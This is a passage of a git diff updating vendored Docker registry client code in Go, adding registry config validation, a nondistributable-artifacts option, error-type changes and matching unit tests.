http.StatusInternalServerError: logrus.Errorf("%s returned status code %d. Response Body :\n%s", req.URL.String(), resp.StatusCode, body) - return "", "", fmt.Errorf("Internal Server Error") + return "", "", errdefs.System(errors.New("Internal Server Error")) } - return "", "", fmt.Errorf("Login: %s (Code: %d; Headers: %s)", body, - resp.StatusCode, resp.Header) + return "", "", errdefs.System(errors.Errorf("Login: %s (Code: %d; Headers: %s)", body, + resp.StatusCode, resp.Header)) } type loginCredentialStore struct { @@ -135,7 +126,7 @@ func (err fallbackError) Error() string { func loginV2(authConfig *types.AuthConfig, endpoint APIEndpoint, userAgent string) (string, string, error) { logrus.Debugf("attempting v2 login to registry endpoint %s", strings.TrimRight(endpoint.URL.String(), "/")+"/v2/") - modifiers := DockerHeaders(userAgent, nil) + modifiers := Headers(userAgent, nil) authTransport := transport.NewTransport(NewTransport(endpoint.TLSConfig), modifiers...) credentialAuthConfig := *authConfig @@ -159,24 +150,25 @@ func loginV2(authConfig *types.AuthConfig, endpoint APIEndpoint, userAgent strin resp, err := loginClient.Do(req) if err != nil { + err = translateV2AuthError(err) if !foundV2 { err = fallbackError{err: err} } + return "", "", err } defer resp.Body.Close() - if resp.StatusCode != http.StatusOK { - // TODO(dmcgowan): Attempt to further interpret result, status code and error code string - err := fmt.Errorf("login attempt to %s failed with status: %d %s", endpointStr, resp.StatusCode, http.StatusText(resp.StatusCode)) - if !foundV2 { - err = fallbackError{err: err} - } - return "", "", err + if resp.StatusCode == http.StatusOK { + return "Login Succeeded", credentialAuthConfig.IdentityToken, nil } - return "Login Succeeded", credentialAuthConfig.IdentityToken, nil - + // TODO(dmcgowan): Attempt to further interpret result, status code and error code string + err = errors.Errorf("login attempt to %s failed with status: %d %s", endpointStr, resp.StatusCode, http.StatusText(resp.StatusCode)) + if !foundV2 { + err = fallbackError{err: err} + } + return "", "", err } func v2AuthHTTPClient(endpoint *url.URL, authTransport http.RoundTripper, modifiers []transport.RequestModifier, creds auth.CredentialStore, scopes []auth.Scope) (*http.Client, bool, error) { @@ -256,6 +248,7 @@ func (err PingResponseError) Error() string { // challenge manager for the supported authentication types and // whether v2 was confirmed by the response. If a response is received but // cannot be interpreted a PingResponseError will be returned. +// nolint: interfacer func PingV2Registry(endpoint *url.URL, transport http.RoundTripper) (challenge.Manager, bool, error) { var ( foundV2 = false diff --git a/vendor/github.com/docker/docker/registry/auth_test.go b/vendor/github.com/docker/docker/registry/auth_test.go index 9ab71aa4fb..f8f3e1997b 100644 --- a/vendor/github.com/docker/docker/registry/auth_test.go +++ b/vendor/github.com/docker/docker/registry/auth_test.go @@ -1,8 +1,4 @@ -// +build !solaris - -// TODO: Support Solaris - -package registry +package registry // import "github.com/docker/docker/registry" import ( "testing" diff --git a/vendor/github.com/docker/docker/registry/config.go b/vendor/github.com/docker/docker/registry/config.go index 9a4f6a9251..de5a526b69 100644 --- a/vendor/github.com/docker/docker/registry/config.go +++ b/vendor/github.com/docker/docker/registry/config.go @@ -1,22 +1,24 @@ -package registry +package registry // import "github.com/docker/docker/registry" import ( - "errors" "fmt" "net" "net/url" + "regexp" + "strconv" "strings" + "github.com/docker/distribution/reference" registrytypes "github.com/docker/docker/api/types/registry" - "github.com/docker/docker/opts" - "github.com/docker/docker/reference" - "github.com/spf13/pflag" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) // ServiceOptions holds command line options. type ServiceOptions struct { - Mirrors []string `json:"registry-mirrors,omitempty"` - InsecureRegistries []string `json:"insecure-registries,omitempty"` + AllowNondistributableArtifacts []string `json:"allow-nondistributable-artifacts,omitempty"` + Mirrors []string `json:"registry-mirrors,omitempty"` + InsecureRegistries []string `json:"insecure-registries,omitempty"` // V2Only controls access to legacy registries. If it is set to true via the // command line flag the daemon will not attempt to contact v1 legacy registries @@ -43,9 +45,6 @@ var ( // IndexName is the name of the index IndexName = "docker.io" - // NotaryServer is the endpoint serving the Notary trust server - NotaryServer = "https://notary.docker.io" - // DefaultV2Registry is the URI of the default v2 registry DefaultV2Registry = &url.URL{ Scheme: "https", @@ -58,40 +57,105 @@ var ( // not have the correct form ErrInvalidRepositoryName = errors.New("Invalid repository name (ex: \"registry.domain.tld/myrepos\")") - emptyServiceConfig = newServiceConfig(ServiceOptions{}) + emptyServiceConfig, _ = newServiceConfig(ServiceOptions{}) +) + +var ( + validHostPortRegex = regexp.MustCompile(`^` + reference.DomainRegexp.String() + `$`) ) // for mocking in unit tests var lookupIP = net.LookupIP -// InstallCliFlags adds command-line options to the top-level flag parser for -// the current process. -func (options *ServiceOptions) InstallCliFlags(flags *pflag.FlagSet) { - mirrors := opts.NewNamedListOptsRef("registry-mirrors", &options.Mirrors, ValidateMirror) - insecureRegistries := opts.NewNamedListOptsRef("insecure-registries", &options.InsecureRegistries, ValidateIndexName) - - flags.Var(mirrors, "registry-mirror", "Preferred Docker registry mirror") - flags.Var(insecureRegistries, "insecure-registry", "Enable insecure registry communication") - - options.installCliPlatformFlags(flags) -} - // newServiceConfig returns a new instance of ServiceConfig -func newServiceConfig(options ServiceOptions) *serviceConfig { +func newServiceConfig(options ServiceOptions) (*serviceConfig, error) { config := &serviceConfig{ ServiceConfig: registrytypes.ServiceConfig{ InsecureRegistryCIDRs: make([]*registrytypes.NetIPNet, 0), - IndexConfigs: make(map[string]*registrytypes.IndexInfo, 0), + IndexConfigs: make(map[string]*registrytypes.IndexInfo), // Hack: Bypass setting the mirrors to IndexConfigs since they are going away // and Mirrors are only for the official registry anyways. - Mirrors: options.Mirrors, }, V2Only: options.V2Only, } + if err := config.LoadAllowNondistributableArtifacts(options.AllowNondistributableArtifacts); err != nil { + return nil, err + } + if err := config.LoadMirrors(options.Mirrors); err != nil { + return nil, err + } + if err := config.LoadInsecureRegistries(options.InsecureRegistries); err != nil { + return nil, err + } + + return config, nil +} + +// LoadAllowNondistributableArtifacts loads allow-nondistributable-artifacts registries into config. +func (config *serviceConfig) LoadAllowNondistributableArtifacts(registries []string) error { + cidrs := map[string]*registrytypes.NetIPNet{} + hostnames := map[string]bool{} + + for _, r := range registries { + if _, err := ValidateIndexName(r); err != nil { + return err + } + if validateNoScheme(r) != nil { + return fmt.Errorf("allow-nondistributable-artifacts registry %s should not contain '://'", r) + } + + if _, ipnet, err := net.ParseCIDR(r); err == nil { + // Valid CIDR. + cidrs[ipnet.String()] = (*registrytypes.NetIPNet)(ipnet) + } else if err := validateHostPort(r); err == nil { + // Must be `host:port` if not CIDR. + hostnames[r] = true + } else { + return fmt.Errorf("allow-nondistributable-artifacts registry %s is not valid: %v", r, err) + } + } + + config.AllowNondistributableArtifactsCIDRs = make([]*(registrytypes.NetIPNet), 0) + for _, c := range cidrs { + config.AllowNondistributableArtifactsCIDRs = append(config.AllowNondistributableArtifactsCIDRs, c) + } + + config.AllowNondistributableArtifactsHostnames = make([]string, 0) + for h := range hostnames { + config.AllowNondistributableArtifactsHostnames = append(config.AllowNondistributableArtifactsHostnames, h) + } + + return nil +} + +// LoadMirrors loads mirrors to config, after removing duplicates. +// Returns an error if mirrors contains an invalid mirror. +func (config *serviceConfig) LoadMirrors(mirrors []string) error { + mMap := map[string]struct{}{} + unique := []string{} + + for _, mirror := range mirrors { + m, err := ValidateMirror(mirror) + if err != nil { + return err + } + if _, exist := mMap[m]; !exist { + mMap[m] = struct{}{} + unique = append(unique, m) + } + } + + config.Mirrors = unique - config.LoadInsecureRegistries(options.InsecureRegistries) + // Configure public registry since mirrors may have changed. + config.IndexConfigs[IndexName] = ®istrytypes.IndexInfo{ + Name: IndexName, + Mirrors: config.Mirrors, + Secure: true, + Official: true, + } - return config + return nil } // LoadInsecureRegistries loads insecure registries to config @@ -109,7 +173,7 @@ func (config *serviceConfig) LoadInsecureRegistries(registries []string) error { originalIndexInfos := config.ServiceConfig.IndexConfigs config.ServiceConfig.InsecureRegistryCIDRs = make([]*registrytypes.NetIPNet, 0) - config.ServiceConfig.IndexConfigs = make(map[string]*registrytypes.IndexInfo, 0) + config.ServiceConfig.IndexConfigs = make(map[string]*registrytypes.IndexInfo) skip: for _, r := range registries { @@ -120,6 +184,19 @@ skip: config.ServiceConfig.IndexConfigs = originalIndexInfos return err } + if strings.HasPrefix(strings.ToLower(r), "http://") { + logrus.Warnf("insecure registry %s should not contain 'http://' and 'http://' has been removed from the insecure registry config", r) + r = r[7:] + } else if strings.HasPrefix(strings.ToLower(r), "https://") { + logrus.Warnf("insecure registry %s should not contain 'https://' and 'https://' has been removed from the insecure registry config", r) + r = r[8:] + } else if validateNoScheme(r) != nil { + // Insecure registry should not contain '://' + // before returning err, roll back to original data + config.ServiceConfig.InsecureRegistryCIDRs = originalCIDRs + config.ServiceConfig.IndexConfigs = originalIndexInfos + return fmt.Errorf("insecure registry %s should not contain '://'", r) + } // Check if CIDR was passed to --insecure-registry _, ipnet, err := net.ParseCIDR(r) if err == nil { @@ -134,6 +211,12 @@ skip: config.InsecureRegistryCIDRs = append(config.InsecureRegistryCIDRs, data) } else { + if err := validateHostPort(r); err != nil { + config.ServiceConfig.InsecureRegistryCIDRs = originalCIDRs + config.ServiceConfig.IndexConfigs = originalIndexInfos + return fmt.Errorf("insecure registry %s is not valid: %v", r, err) + + } // Assume `host:port` if not CIDR. config.IndexConfigs[r] = ®istrytypes.IndexInfo{ Name: r, @@ -155,6 +238,25 @@ skip: return nil } +// allowNondistributableArtifacts returns true if the provided hostname is part of the list of registries +// that allow push of nondistributable artifacts. +// +// The list can contain elements with CIDR notation to specify a whole subnet. If the subnet contains an IP +// of the registry specified by hostname, true is returned. +// +// hostname should be a URL.Host (`host:port` or `host`) where the `host` part can be either a domain name +// or an IP address. If it is a domain name, then it will be resolved to IP addresses for matching. If +// resolution fails, CIDR matching is not performed. +func allowNondistributableArtifacts(config *serviceConfig, hostname string) bool { + for _, h := range config.AllowNondistributableArtifactsHostnames { + if h == hostname { + return true + } + } + + return isCIDRMatch(config.AllowNondistributableArtifactsCIDRs, hostname) +} + // isSecureIndex returns false if the provided indexName is part of the list of insecure registries // Insecure registries accept HTTP and/or accept HTTPS with certificates from unknown CAs. // @@ -173,10 +275,17 @@ func isSecureIndex(config *serviceConfig, indexName string) bool { return index.Secure } - host, _, err := net.SplitHostPort(indexName) + return !isCIDRMatch(config.InsecureRegistryCIDRs, indexName) +} + +// isCIDRMatch returns true if URLHost matches an element of cidrs. URLHost is a URL.Host (`host:port` or `host`) +// where the `host` part can be either a domain name or an IP address. If it is a domain name, then it will be +// resolved to IP addresses for matching. If resolution fails, false is returned. +func isCIDRMatch(cidrs []*registrytypes.NetIPNet, URLHost string) bool { + host, _, err := net.SplitHostPort(URLHost) if err != nil { - // assume indexName is of the form `host` without the port and go on. - host = indexName + // Assume URLHost is of the form `host` without the port and go on. + host = URLHost } addrs, err := lookupIP(host) @@ -193,42 +302,45 @@ func isSecureIndex(config *serviceConfig, indexName string) bool { // Try CIDR notation only if addrs has any elements, i.e. if `host`'s IP could be determined. for _, addr := range addrs { - for _, ipnet := range config.InsecureRegistryCIDRs { + for _, ipnet := range cidrs { // check if the addr falls in the subnet if (*net.IPNet)(ipnet).Contains(addr) { - return false + return true } } } - return true + return false } // ValidateMirror validates an HTTP(S) registry mirror func ValidateMirror(val string) (string, error) { uri, err := url.Parse(val) if err != nil { - return "", fmt.Errorf("%s is not a valid URI", val) + return "", fmt.Errorf("invalid mirror: %q is not a valid URI", val) } - if uri.Scheme != "http" && uri.Scheme != "https" { - return "", fmt.Errorf("Unsupported scheme %s", uri.Scheme) + return "", fmt.Errorf("invalid mirror: unsupported scheme %q in %q", uri.Scheme, uri) } - - if uri.Path != "" || uri.RawQuery != "" || uri.Fragment != "" { - return "", fmt.Errorf("Unsupported path/query/fragment at end of the URI") + if (uri.Path != "" && uri.Path != "/") || uri.RawQuery != "" || uri.Fragment != "" { + return "", fmt.Errorf("invalid mirror: path, query, or fragment at end of the URI %q", uri) } - - return fmt.Sprintf("%s://%s/", uri.Scheme, uri.Host), nil + if uri.User != nil { + // strip password from output + uri.User = url.UserPassword(uri.User.Username(), "xxxxx") + return "", fmt.Errorf("invalid mirror: username/password not allowed in URI %q", uri) + } + return strings.TrimSuffix(val, "/") + "/", nil } // ValidateIndexName validates an index name. func ValidateIndexName(val string) (string, error) { - if val == reference.LegacyDefaultHostname { - val = reference.DefaultHostname + // TODO: upstream this to check to reference package + if val == "index.docker.io" { + val = "docker.io" } if strings.HasPrefix(val, "-") || strings.HasSuffix(val, "-") { - return "", fmt.Errorf("Invalid index name (%s). Cannot begin or end with a hyphen.", val) + return "", fmt.Errorf("invalid index name (%s). Cannot begin or end with a hyphen", val) } return val, nil } @@ -241,6 +353,30 @@ func validateNoScheme(reposName string) error { return nil } +func validateHostPort(s string) error { + // Split host and port, and in case s can not be splitted, assume host only + host, port, err := net.SplitHostPort(s) + if err != nil { + host = s + port = "" + } + // If match against the `host:port` pattern fails, + // it might be `IPv6:port`, which will be captured by net.ParseIP(host) + if !validHostPortRegex.MatchString(s) && net.ParseIP(host) == nil { + return fmt.Errorf("invalid host %q", host) + } + if port != "" { + v, err := strconv.Atoi(port) + if err != nil { + return err + } + if v < 0 || v > 65535 { + return fmt.Errorf("invalid port %q", port) + } + } + return nil +} + // newIndexInfo returns IndexInfo configuration from indexName func newIndexInfo(config *serviceConfig, indexName string) (*registrytypes.IndexInfo, error) { var err error @@ -275,13 +411,14 @@ func GetAuthConfigKey(index *registrytypes.IndexInfo) string { // newRepositoryInfo validates and breaks down a repository name into a RepositoryInfo func newRepositoryInfo(config *serviceConfig, name reference.Named) (*RepositoryInfo, error) { - index, err := newIndexInfo(config, name.Hostname()) + index, err := newIndexInfo(config, reference.Domain(name)) if err != nil { return nil, err } - official := !strings.ContainsRune(name.Name(), '/') + official := !strings.ContainsRune(reference.FamiliarName(name), '/') + return &RepositoryInfo{ - Named: name, + Name: reference.TrimNamed(name), Index: index, Official: official, }, nil diff --git a/vendor/github.com/docker/docker/registry/config_test.go b/vendor/github.com/docker/docker/registry/config_test.go index 25578a7f2b..30a257e325 100644 --- a/vendor/github.com/docker/docker/registry/config_test.go +++ b/vendor/github.com/docker/docker/registry/config_test.go @@ -1,13 +1,138 @@ -package registry +package registry // import "github.com/docker/docker/registry" import ( + "reflect" + "sort" + "strings" "testing" + + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) +func TestLoadAllowNondistributableArtifacts(t *testing.T) { + testCases := []struct { + registries []string + cidrStrs []string + hostnames []string + err string + }{ + { + registries: []string{"1.2.3.0/24"}, + cidrStrs: []string{"1.2.3.0/24"}, + }, + { + registries: []string{"2001:db8::/120"}, + cidrStrs: []string{"2001:db8::/120"}, + }, + { + registries: []string{"127.0.0.1"}, + hostnames: []string{"127.0.0.1"}, + }, + { + registries: []string{"127.0.0.1:8080"}, + hostnames: []string{"127.0.0.1:8080"}, + }, + { + registries: []string{"2001:db8::1"}, + hostnames: []string{"2001:db8::1"}, + }, + { + registries: []string{"[2001:db8::1]:80"}, + hostnames: []string{"[2001:db8::1]:80"}, + }, + { + registries: []string{"[2001:db8::1]:80"}, + hostnames: []string{"[2001:db8::1]:80"}, + }, + { + registries: []string{"1.2.3.0/24", "2001:db8::/120", "127.0.0.1", "127.0.0.1:8080"}, + cidrStrs: []string{"1.2.3.0/24", "2001:db8::/120"}, + hostnames: []string{"127.0.0.1", "127.0.0.1:8080"}, + }, + + { + registries: []string{"http://mytest.com"}, + err: "allow-nondistributable-artifacts registry http://mytest.com should not contain '://'", + }, + { + registries: []string{"https://mytest.com"}, + err: "allow-nondistributable-artifacts registry https://mytest.com should not contain '://'", + }, + { + registries: []string{"HTTP://mytest.com"}, + err: "allow-nondistributable-artifacts registry HTTP://mytest.com should not contain '://'", + }, + { + registries: []string{"svn://mytest.com"}, + err: "allow-nondistributable-artifacts registry svn://mytest.com should not contain '://'", + }, + { + registries: []string{"-invalid-registry"}, + err: "Cannot begin or end with a hyphen", + }, + { + registries: []string{`mytest-.com`}, + err: `allow-nondistributable-artifacts registry mytest-.com is not valid: invalid host "mytest-.com"`, + }, + { + registries: []string{`1200:0000:AB00:1234:0000:2552:7777:1313:8080`}, + err: `allow-nondistributable-artifacts registry 1200:0000:AB00:1234:0000:2552:7777:1313:8080 is not valid: invalid host "1200:0000:AB00:1234:0000:2552:7777:1313:8080"`, + }, + { + registries: []string{`mytest.com:500000`}, + err: `allow-nondistributable-artifacts registry mytest.com:500000 is not valid: invalid port "500000"`, + }, + { + registries: []string{`"mytest.com"`}, + err: `allow-nondistributable-artifacts registry "mytest.com" is not valid: invalid host "\"mytest.com\""`, + }, + { + registries: []string{`"mytest.com:5000"`}, + err: `allow-nondistributable-artifacts registry "mytest.com:5000" is not valid: invalid host "\"mytest.com"`, + }, + } + for _, testCase := range testCases { + config := emptyServiceConfig + err := config.LoadAllowNondistributableArtifacts(testCase.registries) + if testCase.err == "" { + if err != nil { + t.Fatalf("expect no error, got '%s'", err) + } + + var cidrStrs []string + for _, c := range config.AllowNondistributableArtifactsCIDRs { + cidrStrs = append(cidrStrs, c.String()) + } + + sort.Strings(testCase.cidrStrs) + sort.Strings(cidrStrs) + if (len(testCase.cidrStrs) > 0 || len(cidrStrs) > 0) && !reflect.DeepEqual(testCase.cidrStrs, cidrStrs) { + t.Fatalf("expect AllowNondistributableArtifactsCIDRs to be '%+v', got '%+v'", testCase.cidrStrs, cidrStrs) + } + + sort.Strings(testCase.hostnames) + sort.Strings(config.AllowNondistributableArtifactsHostnames) + if (len(testCase.hostnames) > 0 || len(config.AllowNondistributableArtifactsHostnames) > 0) && !reflect.DeepEqual(testCase.hostnames, config.AllowNondistributableArtifactsHostnames) { + t.Fatalf("expect AllowNondistributableArtifactsHostnames to be '%+v', got '%+v'", testCase.hostnames, config.AllowNondistributableArtifactsHostnames) + } + } else { + if err == nil { + t.Fatalf("expect error '%s', got no error", testCase.err) + } + if !strings.Contains(err.Error(), testCase.err) { + t.Fatalf("expect error '%s', got '%s'", testCase.err, err) + } + } + } +} + func TestValidateMirror(t *testing.T) { valid := []string{ "http://mirror-1.com", + "http://mirror-1.com/", "https://mirror-1.com", + "https://mirror-1.com/", "http://localhost", "https://localhost", "http://localhost:5000", @@ -21,15 +146,14 @@ func TestValidateMirror(t *testing.T) { invalid := []string{ "!invalid!://%as%", "ftp://mirror-1.com", - "http://mirror-1.com/", "http://mirror-1.com/?q=foo", "http://mirror-1.com/v1/", "http://mirror-1.com/v1/?q=foo", "http://mirror-1.com/v1/?q=foo#frag", "http://mirror-1.com?q=foo", "https://mirror-1.com#frag", - "https://mirror-1.com/", "https://mirror-1.com/#frag", + "http://foo:bar@mirror-1.com/", "https://mirror-1.com/v1/", "https://mirror-1.com/v1/#", "https://mirror-1.com?q", @@ -47,3 +171,211 @@ func TestValidateMirror(t *testing.T) { } } } + +func TestLoadInsecureRegistries(t *testing.T) { + testCases := []struct { + registries []string + index string + err string + }{ + { + registries: []string{"127.0.0.1"}, + index: "127.0.0.1", + }, + { + registries: []string{"127.0.0.1:8080"}, + index: "127.0.0.1:8080", + }, + { + registries: []string{"2001:db8::1"}, + index: "2001:db8::1", + }, + { + registries: []string{"[2001:db8::1]:80"}, + index: "[2001:db8::1]:80", + }, + { + registries: []string{"http://mytest.com"}, + index: "mytest.com", + }, + { + registries: []string{"https://mytest.com"}, + index: "mytest.com", + }, + { + registries: []string{"HTTP://mytest.com"}, + index: "mytest.com", + }, + { + registries: []string{"svn://mytest.com"}, + err: "insecure registry svn://mytest.com should not contain '://'", + }, + { + registries: []string{"-invalid-registry"}, + err: "Cannot begin or end with a hyphen", + }, + { + registries: []string{`mytest-.com`}, + err: `insecure registry mytest-.com is not valid: invalid host "mytest-.com"`, + }, + { + registries: []string{`1200:0000:AB00:1234:0000:2552:7777:1313:8080`}, + err: `insecure registry 1200:0000:AB00:1234:0000:2552:7777:1313:8080 is not valid: invalid host "1200:0000:AB00:1234:0000:2552:7777:1313:8080"`, + }, + { + registries: []string{`mytest.com:500000`}, + err: `insecure registry mytest.com:500000 is not valid: invalid port "500000"`, + }, + { + registries: []string{`"mytest.com"`}, + err: `insecure registry "mytest.com" is not valid: invalid host "\"mytest.com\""`, + }, + { + registries: []string{`"mytest.com:5000"`}, + err: `insecure registry "mytest.com:5000" is not valid: invalid host "\"mytest.com"`, + }, + } + for _, testCase := range testCases { + config := emptyServiceConfig + err := config.LoadInsecureRegistries(testCase.registries) + if testCase.err == "" { + if err != nil { + t.Fatalf("expect no error, got '%s'", err) + } + match := false + for index := range config.IndexConfigs { + if index == testCase.index { + match = true + } + } + if !match { + t.Fatalf("expect index configs to contain '%s', got %+v", testCase.index, config.IndexConfigs) + } + } else { + if err == nil { + t.Fatalf("expect error '%s', got no error", testCase.err) + } + if !strings.Contains(err.Error(), testCase.err) { + t.Fatalf("expect error '%s', got '%s'", testCase.err, err) + } + } + } +} + +func TestNewServiceConfig(t *testing.T) { + testCases := []struct { + opts ServiceOptions + errStr string + }{ + { + ServiceOptions{}, + "", + }, + { + ServiceOptions{ + Mirrors: []string{"example.com:5000"}, + }, + `invalid mirror: unsupported scheme "example.com" in "example.com:5000"`, + }, + { + ServiceOptions{ + Mirrors: []string{"http://example.com:5000"}, + }, + "", + }, + { + ServiceOptions{ + InsecureRegistries: []string{"[fe80::]/64"}, + }, + `insecure registry [fe80::]/64 is not valid: invalid host "[fe80::]/64"`, + }, + { + ServiceOptions{ + InsecureRegistries: []string{"102.10.8.1/24"}, + }, + "", + }, + { + ServiceOptions{ + AllowNondistributableArtifacts: []string{"[fe80::]/64"}, + }, + `allow-nondistributable-artifacts registry [fe80::]/64 is not valid: invalid host "[fe80::]/64"`, + }, + { + ServiceOptions{ + AllowNondistributableArtifacts: []string{"102.10.8.1/24"}, + }, + "", + }, + } + + for _, testCase := range testCases { + _, err := newServiceConfig(testCase.opts) + if testCase.errStr != "" { + assert.Check(t, is.Error(err, testCase.errStr)) + } else { + assert.Check(t, err) + } + } +} + +func TestValidateIndexName(t *testing.T) { + valid := []struct { + index string + expect string + }{ + { + index: "index.docker.io", + expect: "docker.io", + }, + { + index: "example.com", + expect: "example.com", + }, + { + index: "127.0.0.1:8080", + expect: "127.0.0.1:8080", + }, + { + index: "mytest-1.com", + expect: "mytest-1.com", + }, + { + index: "mirror-1.com/v1/?q=foo", + expect: "mirror-1.com/v1/?q=foo", + }, + } + + for _, testCase := range valid { + result, err := ValidateIndexName(testCase.index) + if assert.Check(t, err) { + assert.Check(t, is.Equal(testCase.expect, result)) + } + + } + +} + +func TestValidateIndexNameWithError(t *testing.T) { + invalid := []struct { + index string + err string + }{ + { + index: "docker.io-", + err: "invalid index name (docker.io-). Cannot begin or end with a hyphen", + }, + { + index: "-example.com", + err: "invalid index name (-example.com). Cannot begin or end with a hyphen", + }, + { + index: "mirror-1.com/v1/?q=foo-", + err: "invalid index name (mirror-1.com/v1/?q=foo-). Cannot begin or end with a hyphen", + }, + } + for _, testCase := range invalid { + _, err := ValidateIndexName(testCase.index) + assert.Check(t, is.Error(err, testCase.err)) + } +} diff --git a/vendor/github.com/docker/docker/registry/config_unix.go b/vendor/github.com/docker/docker/registry/config_unix.go index d692e8ef50..20fb47bcae 100644 --- a/vendor/github.com/docker/docker/registry/config_unix.go +++ b/vendor/github.com/docker/docker/registry/config_unix.go @@ -1,10 +1,6 @@ // +build !windows -package registry - -import ( - "github.com/spf13/pflag" -) +package registry // import "github.com/docker/docker/registry" var ( // CertsDir is the directory where certificates are stored @@ -18,8 +14,3 @@ var ( func cleanPath(s string) string { return s } - -// installCliPlatformFlags handles any platform specific flags for the service. -func (options *ServiceOptions) installCliPlatformFlags(flags *pflag.FlagSet) { - flags.BoolVar(&options.V2Only, "disable-legacy-registry", false, "Disable contacting legacy registries") -} diff --git a/vendor/github.com/docker/docker/registry/config_windows.go b/vendor/github.com/docker/docker/registry/config_windows.go index d1b313dc1e..6de0508f87 100644 --- a/vendor/github.com/docker/docker/registry/config_windows.go +++ b/vendor/github.com/docker/docker/registry/config_windows.go @@ -1,11 +1,9 @@ -package registry +package registry // import "github.com/docker/docker/registry" import ( "os" "path/filepath" "strings" - - "github.com/spf13/pflag" ) // CertsDir is the directory where certificates are stored @@ -18,8 +16,3 @@ var CertsDir = os.Getenv("programdata") + `\docker\certs.d` func cleanPath(s string) string { return filepath.FromSlash(strings.Replace(s, ":", "", -1)) } - -// installCliPlatformFlags handles any platform specific flags for the service. -func (options *ServiceOptions) installCliPlatformFlags(flags *pflag.FlagSet) { - // No Windows specific flags. -} diff --git a/vendor/github.com/docker/docker/registry/endpoint_test.go b/vendor/github.com/docker/docker/registry/endpoint_test.go index 8451d3f678..9268c3a4f0 100644 --- a/vendor/github.com/docker/docker/registry/endpoint_test.go +++ b/vendor/github.com/docker/docker/registry/endpoint_test.go @@ -1,4 +1,4 @@ -package registry +package registry // import "github.com/docker/docker/registry" import ( "net/http" diff --git a/vendor/github.com/docker/docker/registry/endpoint_v1.go b/vendor/github.com/docker/docker/registry/endpoint_v1.go index 6bcf8c935d..832fdb95a4 100644 --- a/vendor/github.com/docker/docker/registry/endpoint_v1.go +++ b/vendor/github.com/docker/docker/registry/endpoint_v1.go @@ -1,4 +1,4 @@ -package registry +package registry // import "github.com/docker/docker/registry" import ( "crypto/tls" @@ -9,9 +9,9 @@ import ( "net/url" "strings" - "github.com/Sirupsen/logrus" "github.com/docker/distribution/registry/client/transport" registrytypes "github.com/docker/docker/api/types/registry" + "github.com/sirupsen/logrus" ) // V1Endpoint stores basic information about a V1 registry endpoint. @@ -67,9 +67,9 @@ func validateEndpoint(endpoint *V1Endpoint) error { return nil } -func newV1Endpoint(address url.URL, tlsConfig *tls.Config, userAgent string, metaHeaders http.Header) (*V1Endpoint, error) { +func newV1Endpoint(address url.URL, tlsConfig *tls.Config, userAgent string, metaHeaders http.Header) *V1Endpoint { endpoint := &V1Endpoint{ - IsSecure: (tlsConfig == nil || !tlsConfig.InsecureSkipVerify), + IsSecure: tlsConfig == nil || !tlsConfig.InsecureSkipVerify, URL: new(url.URL), } @@ -77,8 +77,8 @@ func newV1Endpoint(address url.URL, tlsConfig *tls.Config, userAgent string, met // TODO(tiborvass): make sure a ConnectTimeout transport is used tr := NewTransport(tlsConfig) - endpoint.client = HTTPClient(transport.NewTransport(tr, DockerHeaders(userAgent, metaHeaders)...)) - return endpoint, nil + endpoint.client = HTTPClient(transport.NewTransport(tr, Headers(userAgent, metaHeaders)...)) + return endpoint } // trimV1Address trims the version off the address and returns the @@ -123,7 +123,7 @@ func newV1EndpointFromStr(address string, tlsConfig *tls.Config, userAgent strin return nil, err } - endpoint, err := newV1Endpoint(*uri, tlsConfig, userAgent, metaHeaders) + endpoint := newV1Endpoint(*uri, tlsConfig, userAgent, metaHeaders) if err != nil { return nil, err } @@ -175,7 +175,7 @@ func (e *V1Endpoint) Ping() (PingResult, error) { Standalone: true, } if err := json.Unmarshal(jsonString, &info); err != nil { - logrus.Debugf("Error unmarshalling the _ping PingResult: %s", err) + logrus.Debugf("Error unmarshaling the _ping PingResult: %s", err) // don't stop here. Just assume sane defaults } if hdr := resp.Header.Get("X-Docker-Registry-Version"); hdr != "" { diff --git a/vendor/github.com/docker/docker/registry/errors.go b/vendor/github.com/docker/docker/registry/errors.go new file mode 100644 index 0000000000..5bab02e5e2 --- /dev/null +++ b/vendor/github.com/docker/docker/registry/errors.go @@ -0,0 +1,31 @@ +package registry // import "github.com/docker/docker/registry" + +import ( + "net/url" + + "github.com/docker/distribution/registry/api/errcode" + "github.com/docker/docker/errdefs" +) + +type notFoundError string + +func (e notFoundError) Error() string { + return string(e) +} + +func (notFoundError) NotFound() {} + +func translateV2AuthError(err error) error { + switch e := err.(type) { + case *url.Error: + switch e2 := e.Err.(type) { + case errcode.Error: + switch e2.Code { + case errcode.ErrorCodeUnauthorized: + return errdefs.Unauthorized(err) + } + } + } + + return err +} diff --git a/vendor/github.com/docker/docker/registry/registry.go b/vendor/github.com/docker/docker/registry/registry.go index 17fa97ce3d..7a84bbfb7e 100644 --- a/vendor/github.com/docker/docker/registry/registry.go +++ b/vendor/github.com/docker/docker/registry/registry.go @@ -1,5 +1,5 @@ // Package registry contains client primitives to interact with a remote Docker registry. -package registry +package registry // import "github.com/docker/docker/registry" import ( "crypto/tls" @@ -13,10 +13,10 @@ import ( "strings" "time" - "github.com/Sirupsen/logrus" "github.com/docker/distribution/registry/client/transport" "github.com/docker/go-connections/sockets" "github.com/docker/go-connections/tlsconfig" + "github.com/sirupsen/logrus" ) var ( @@ -81,7 +81,7 @@ func ReadCertsDirectory(tlsConfig *tls.Config, directory string) error { keyName := certName[:len(certName)-5] + ".key" logrus.Debugf("cert: %s", filepath.Join(directory, f.Name())) if !hasFile(fs, keyName) { - return fmt.Errorf("Missing key %s for client certificate %s. Note that CA certificates should use the extension .crt.", keyName, certName) + return fmt.Errorf("missing key %s for client certificate %s. Note that CA certificates should use the extension .crt", keyName, certName) } cert, err := tls.LoadX509KeyPair(filepath.Join(directory, certName), filepath.Join(directory, keyName)) if err != nil { @@ -102,8 +102,8 @@ func ReadCertsDirectory(tlsConfig *tls.Config, directory string) error { return nil } -// DockerHeaders returns request modifiers with a User-Agent and metaHeaders -func DockerHeaders(userAgent string, metaHeaders http.Header) []transport.RequestModifier { +// Headers returns request modifiers with a User-Agent and metaHeaders +func Headers(userAgent string, metaHeaders http.Header) []transport.RequestModifier { modifiers := []transport.RequestModifier{} if userAgent != "" { modifiers = append(modifiers, transport.NewHeaderRequestModifier(http.Header{ diff --git a/vendor/github.com/docker/docker/registry/registry_mock_test.go b/vendor/github.com/docker/docker/registry/registry_mock_test.go index 21fc1fdcc7..bf17eb9fc7 100644 --- a/vendor/github.com/docker/docker/registry/registry_mock_test.go +++ 